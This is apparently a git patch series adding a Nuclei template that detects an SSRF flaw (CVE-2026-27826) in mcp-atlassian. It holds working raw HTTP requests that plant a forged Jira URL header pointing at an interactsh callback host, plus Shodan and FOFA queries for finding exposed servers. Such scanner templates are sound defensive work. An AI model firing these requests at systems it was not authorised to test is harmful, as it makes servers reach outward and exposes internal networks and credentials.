From b249bec73eb297edff9b44e297efa3be53ff0b6c Mon Sep 17 00:00:00 2001 From: eyangfeng88-arch Date: Thu, 16 Apr 2026 23:14:26 +0800 Subject: [PATCH 1/3] feat: add CVE-2026-27826 mcp-atlassian SSRF template --- http/cves/2026/CVE-2026-27826.yaml | 79 ++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 http/cves/2026/CVE-2026-27826.yaml diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml new file mode 100644 index 000000000000..6948203fd04e --- /dev/null +++ b/http/cves/2026/CVE-2026-27826.yaml @@ -0,0 +1,79 @@ +id: CVE-2026-27826 + +info: + name: mcp-atlassian < 0.17.0 - SSRF + author: eyangfeng88-arch + severity: high + description: | + MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint. + impact: | + Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft. + remediation: | + Upgrade to version 0.17.0 or later. + reference: + - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/ + - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9 + - https://github.com/sooperset/mcp-atlassian/pull/986 + - https://nvd.nist.gov/vuln/detail/CVE-2026-27826 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 8.2 + cve-id: CVE-2026-27826 + cwe-id: CWE-918 + metadata: + verified: true + max-request: 2 + vendor: sooperset + product: mcp-atlassian + shodan-query: http.html:"Atlassian MCP" + fofa-query: body="Atlassian MCP" || header="mcp-session-id" + tags: cve,cve2026,mcp,atlassian,ssrf,oast + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /mcp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: application/json, text/event-stream + + {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}} + + extractors: + - type: regex + name: session_id + part: header + internal: true + group: 1 + regex: + - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Atlassian MCP")' + - 'len(session_id) > 0' + condition: and + internal: true + + - raw: + - | + POST /mcp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: application/json, text/event-stream + Mcp-Session-Id: {{session_id}} + X-Atlassian-Confluence-Url: http://{{interactsh-url}} + X-Atlassian-Confluence-Personal-Token: nuclei-ssrf-test + + {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"confluence_search","arguments":{"query":"test"}}} + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")' + - 'contains(body, "jsonrpc")' + condition: and From 9c8a00971e48802419b392293baca6e406d40c41 Mon Sep 17 00:00:00 2001 From: eyangfeng88-arch Date: Sat, 18 Apr 2026 03:05:05 +0800 Subject: [PATCH 2/3] fix: correct CVSS vector and use Jira endpoint per GHSA PoC --- http/cves/2026/CVE-2026-27826.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml index 6948203fd04e..4a4f49577e18 100644 --- a/http/cves/2026/CVE-2026-27826.yaml +++ b/http/cves/2026/CVE-2026-27826.yaml @@ -16,7 +16,7 @@ info: - https://github.com/sooperset/mcp-atlassian/pull/986 - https://nvd.nist.gov/vuln/detail/CVE-2026-27826 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2026-27826 cwe-id: CWE-918 @@ -54,7 +54,6 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains(body, "Atlassian MCP")' - 'len(session_id) > 0' condition: and internal: true @@ -66,14 +65,13 @@ http: Content-Type: application/json Accept: application/json, text/event-stream Mcp-Session-Id: {{session_id}} - X-Atlassian-Confluence-Url: http://{{interactsh-url}} - X-Atlassian-Confluence-Personal-Token: nuclei-ssrf-test + X-Atlassian-Jira-Url: http://{{interactsh-url}} + X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test - {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"confluence_search","arguments":{"query":"test"}}} + {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}} matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")' - - 'contains(body, "jsonrpc")' condition: and From cfa3b7a8668c9364f3b8f4cfa60b7622e501be95 Mon Sep 17 00:00:00 2001 From: eyangfeng88-arch Date: Sat, 18 Apr 2026 03:13:31 +0800 Subject: [PATCH 3/3] fix: correct CVSS vector and use Jira endpoint per GHSA PoC --- http/cves/2026/CVE-2026-27826.yaml | 154 ++++++++++++++--------------- 1 file changed, 77 insertions(+), 77 deletions(-) diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml index 4a4f49577e18..688b668f2022 100644 --- a/http/cves/2026/CVE-2026-27826.yaml +++ b/http/cves/2026/CVE-2026-27826.yaml @@ -1,77 +1,77 @@ -id: CVE-2026-27826 - -info: - name: mcp-atlassian < 0.17.0 - SSRF - author: eyangfeng88-arch - severity: high - description: | - MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint. - impact: | - Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft. - remediation: | - Upgrade to version 0.17.0 or later. - reference: - - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/ - - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9 - - https://github.com/sooperset/mcp-atlassian/pull/986 - - https://nvd.nist.gov/vuln/detail/CVE-2026-27826 - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - cvss-score: 8.2 - cve-id: CVE-2026-27826 - cwe-id: CWE-918 - metadata: - verified: true - max-request: 2 - vendor: sooperset - product: mcp-atlassian - shodan-query: http.html:"Atlassian MCP" - fofa-query: body="Atlassian MCP" || header="mcp-session-id" - tags: cve,cve2026,mcp,atlassian,ssrf,oast - -flow: http(1) && http(2) - -http: - - raw: - - | - POST /mcp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Accept: application/json, text/event-stream - - {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}} - - extractors: - - type: regex - name: session_id - part: header - internal: true - group: 1 - regex: - - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)' - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'len(session_id) > 0' - condition: and - internal: true - - - raw: - - | - POST /mcp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Accept: application/json, text/event-stream - Mcp-Session-Id: {{session_id}} - X-Atlassian-Jira-Url: http://{{interactsh-url}} - X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test - - {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}} - - matchers: - - type: dsl - dsl: - - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")' - condition: and +id: CVE-2026-27826 + +info: + name: mcp-atlassian < 0.17.0 - SSRF + author: eyangfeng88-arch + severity: high + description: | + MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint. + impact: | + Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft. + remediation: | + Upgrade to version 0.17.0 or later. + reference: + - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/ + - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9 + - https://github.com/sooperset/mcp-atlassian/pull/986 + - https://nvd.nist.gov/vuln/detail/CVE-2026-27826 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2026-27826 + cwe-id: CWE-918 + metadata: + verified: true + max-request: 2 + vendor: sooperset + product: mcp-atlassian + shodan-query: http.html:"Atlassian MCP" + fofa-query: body="Atlassian MCP" || header="mcp-session-id" + tags: cve,cve2026,mcp,atlassian,ssrf,oast + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /mcp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: application/json, text/event-stream + + {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}} + + extractors: + - type: regex + name: session_id + part: header + internal: true + group: 1 + regex: + - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'len(session_id) > 0' + condition: and + internal: true + + - raw: + - | + POST /mcp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: application/json, text/event-stream + Mcp-Session-Id: {{session_id}} + X-Atlassian-Jira-Url: http://{{interactsh-url}} + X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test + + {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}} + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")' + condition: and